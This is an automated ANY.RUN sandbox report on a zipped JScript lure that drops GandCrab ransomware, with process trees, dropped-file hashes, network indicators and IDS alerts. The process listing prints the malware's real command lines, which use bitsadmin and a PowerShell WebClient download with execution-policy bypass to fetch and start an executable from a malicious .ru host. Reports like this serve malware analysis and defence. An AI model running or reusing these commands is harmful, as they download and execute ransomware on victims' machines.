analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Love_You_2019_33235120-txt.zip

Full analysis: https://app.any.run/tasks/31a750d1-eb82-439e-88a1-ecd16dc2bb9c
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: January 10, 2019, 16:48:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
ransomware
gandcrab
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5:

4BA6F3BB179C007D8235821B4DFB3B2E

SHA1:

2372175819B3FC2EE9E828B2F54749A0ABAA224C

SHA256:

B25D091456AC14F044C01F9449D4DD86687FD083D563A43D5571D485283E917A

SSDEEP:

24:LraergaheN8YR9M4VDTX6FHoH+4D1mz0EtofWVWn6UtcX4oAphGpxraeLgkg:faergahi8Y9M4VDOK1mIEtO6UtMAphGY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 979574639568794.exe (PID: 3844)
      • 495958594939.exe (PID: 1820)
      • winsvcs.exe (PID: 2648)
      • 2746537711.exe (PID: 3736)
      • winsvcs.exe (PID: 2928)
      • 3875839546.exe (PID: 3676)
      • 3468116065.exe (PID: 2180)
      • wincfg32svc.exe (PID: 3568)
      • 1958842343.exe (PID: 2160)
      • 3088011411.exe (PID: 2124)
      • 3358028963.exe (PID: 3828)
      • 3782739527.exe (PID: 3124)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2700)
    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 2544)
    • Changes the autorun value in the registry

      • 979574639568794.exe (PID: 3844)
      • 2746537711.exe (PID: 3736)
      • 3875839546.exe (PID: 3676)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3784)
      • winsvcs.exe (PID: 2648)
    • GandCrab keys found

      • 3468116065.exe (PID: 2180)
    • Disables Windows System Restore

      • winsvcs.exe (PID: 2928)
    • Changes Security Center notification settings

      • winsvcs.exe (PID: 2928)
    • Actions looks like stealing of personal data

      • 3468116065.exe (PID: 2180)
    • Disables Windows Defender Real-time monitoring

      • winsvcs.exe (PID: 2928)
    • Writes file to Word startup folder

      • 3468116065.exe (PID: 2180)
    • Downloads executable files from IP

      • winsvcs.exe (PID: 2648)
    • Deletes shadow copies

      • 3468116065.exe (PID: 2180)
    • Renames files like Ransomware

      • 3468116065.exe (PID: 2180)
    • Dropped file may contain instructions of ransomware

      • 3468116065.exe (PID: 2180)
    • Changes settings of System certificates

      • 3468116065.exe (PID: 2180)
    • Connects to CnC server

      • 3468116065.exe (PID: 2180)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2884)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3784)
      • 979574639568794.exe (PID: 3844)
      • 2746537711.exe (PID: 3736)
      • winsvcs.exe (PID: 2648)
      • 3875839546.exe (PID: 3676)
      • winsvcs.exe (PID: 2928)
    • Creates files in the user directory

      • powershell.exe (PID: 3784)
      • winsvcs.exe (PID: 2648)
      • 3468116065.exe (PID: 2180)
    • Starts itself from another location

      • 979574639568794.exe (PID: 3844)
      • 2746537711.exe (PID: 3736)
      • 3875839546.exe (PID: 3676)
      • winsvcs.exe (PID: 2928)
    • Creates files in the program directory

      • 3468116065.exe (PID: 2180)
    • Connects to SMTP port

      • wincfg32svc.exe (PID: 3568)
    • Reads the cookies of Mozilla Firefox

      • 3468116065.exe (PID: 2180)
    • Creates files like Ransomware instruction

      • 3468116065.exe (PID: 2180)
    • Reads Internet Cache Settings

      • 3468116065.exe (PID: 2180)
    • Adds / modifies Windows certificates

      • 3468116065.exe (PID: 2180)
  • INFO

    • Dropped object may contain TOR URL's

      • 3468116065.exe (PID: 2180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: Love_You_2019_33235120-txt.js
ZipUncompressedSize: 1155
ZipCompressedSize: 1155
ZipCRC: 0x96a24e80
ZipModifyDate: 2004:01:10 15:25:17
ZipCompression: None
ZipBitFlag: -
ZipRequiredVersion: 10
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
19
Malicious processes
9
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start winrar.exe no specs wscript.exe no specs cmd.exe no specs cmd.exe no specs bitsadmin.exe no specs powershell.exe 979574639568794.exe winsvcs.exe 495958594939.exe no specs 2746537711.exe 3875839546.exe winsvcs.exe wincfg32svc.exe #GANDCRAB 3468116065.exe 1958842343.exe no specs 3088011411.exe no specs wmic.exe no specs 3358028963.exe no specs 3782739527.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2820"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2884"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2544"C:\Windows\System32\cmd.exe" /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe&start C:\Users\admin\AppData\Local\Temp\495958594939.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2700"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3664bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exeC:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3784PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3844"C:\Users\admin\AppData\Local\Temp\979574639568794.exe" C:\Users\admin\AppData\Local\Temp\979574639568794.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2648C:\Users\admin\495030305060\winsvcs.exeC:\Users\admin\495030305060\winsvcs.exe
979574639568794.exe
User:
admin
Integrity Level:
MEDIUM
1820C:\Users\admin\AppData\Local\Temp\495958594939.exe C:\Users\admin\AppData\Local\Temp\495958594939.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3736C:\Users\admin\AppData\Local\Temp\2746537711.exeC:\Users\admin\AppData\Local\Temp\2746537711.exe
winsvcs.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
1 289
Read events
1 116
Write events
171
Delete events
2

Modification events

(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2820) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip
(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2820) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4804
Value:
JScript Script File
(PID) Process:(2820) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
Executable files
14
Suspicious files
280
Text files
210
Unknown types
8

Dropped files

PID
Process
Filename
Type
3784powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AZEBQKZNSY4ZRULWIKZ7.temp
MD5:
SHA256:
21803468116065.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
MD5:
SHA256:
2820WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa2820.42473\Love_You_2019_33235120-txt.jstext
MD5:10031E28A920C0DB269D390D450DB6C4
SHA256:4D6D0ACC27840390EA68C6DB3282B007CB34A5D6BAA4EB936B68CD94B675BE83
3844979574639568794.exeC:\Users\admin\495030305060\winsvcs.exeexecutable
MD5:3ABB1F4A8F2FDEB302985911BFEFD6BF
SHA256:5E901677DAD76C0DC21DA659115B4D08E1E27C279C1CD038518AE1518646C306
3784powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2648winsvcs.exeC:\Users\admin\AppData\Local\Temp\2746537711.exeexecutable
MD5:B58FE475F58E3070E3F506085108EF76
SHA256:35DE112DE2021EB54DEA91383112609551240DB7D95AC0171D224CA13FA4E0E5
3784powershell.exeC:\Users\admin\AppData\Local\Temp\979574639568794.exeexecutable
MD5:3ABB1F4A8F2FDEB302985911BFEFD6BF
SHA256:5E901677DAD76C0DC21DA659115B4D08E1E27C279C1CD038518AE1518646C306
2648winsvcs.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\2[1].exeexecutable
MD5:9CCE24E78759E70020A4C1C82359F471
SHA256:9A3064A02F7D45B5D073D5653C53694EBFD37AF6255A0B928703A11EAC4A142D
21803468116065.exeC:\Users\admin\ZHSQVZ-DECRYPT.txttext
MD5:F28C4E7D8FC6A81DBBE8F75C49B8257B
SHA256:7366A68D646A504E3DE2E2494C4494B848A05D53F5231720E017B01DCECD8C0D
2648winsvcs.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[2].exeexecutable
MD5:5A31E0AE80102A6B25FA0CA56CF7C15E
SHA256:DC92A406EC40D1356ABBD8DD8EA8CA90AE84516B741D3D898F892DB31D470480
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
49
TCP/UDP connections
32
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
malicious
2648
winsvcs.exe
GET
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/2.exe
RU
malicious
2648
winsvcs.exe
GET
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/1.exe
RU
malicious
GET
206
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
binary
5.23 Kb
malicious
2648
winsvcs.exe
GET
92.63.197.48:80
http://92.63.197.48/m/1.exe
RU
malicious
3784
powershell.exe
GET
200
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
executable
15.0 Kb
malicious
GET
206
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
abr
5.21 Kb
malicious
GET
206
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
executable
4.50 Kb
malicious
2648
winsvcs.exe
GET
200
92.63.197.48:80
http://92.63.197.48/m/1.exe
RU
executable
247 Kb
malicious
2648
winsvcs.exe
GET
200
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/1.exe
RU
executable
261 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2928
winsvcs.exe
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
3568
wincfg32svc.exe
66.218.85.139:25
mta6.am0.yahoodns.net
Yahoo!
US
unknown
2648
winsvcs.exe
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
3784
powershell.exe
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
2180
3468116065.exe
78.46.77.98:80
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
2180
3468116065.exe
217.26.53.161:80
www.haargenau.biz
Hostpoint AG
CH
malicious
2180
3468116065.exe
74.220.215.73:80
www.bizziniinfissi.com
Unified Layer
US
malicious
2180
3468116065.exe
78.46.77.98:443
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
2180
3468116065.exe
138.201.162.99:80
www.fliptray.biz
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
slpsrgpsrhojifdij.ru
  • 92.63.197.48
malicious
yahoo.com
whitelisted
mta6.am0.yahoodns.net
  • 66.218.85.139
  • 74.6.137.63
  • 98.137.159.28
  • 98.137.159.26
  • 98.136.101.117
  • 74.6.137.64
  • 67.195.228.141
  • 98.137.159.25
whitelisted
www.2mmotorsport.biz
  • 78.46.77.98
unknown
www.haargenau.biz
  • 217.26.53.161
unknown
osheoufhusheoghuesd.ru
malicious
www.bizziniinfissi.com
  • 74.220.215.73
malicious
www.holzbock.biz
  • 136.243.13.215
unknown
www.fliptray.biz
  • 138.201.162.99
malicious
www.pizcam.com
  • 192.185.159.253
unknown

Threats

PID
Process
Class
Message
A Network Trojan was detected
SC BAD_UNKNOWN Request, which might be made by Trojan-Downloader.MSOffice.DdeExec
3784
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2648
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2648
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2648
winsvcs.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2648
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2648
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2648
winsvcs.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2648
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
No debug info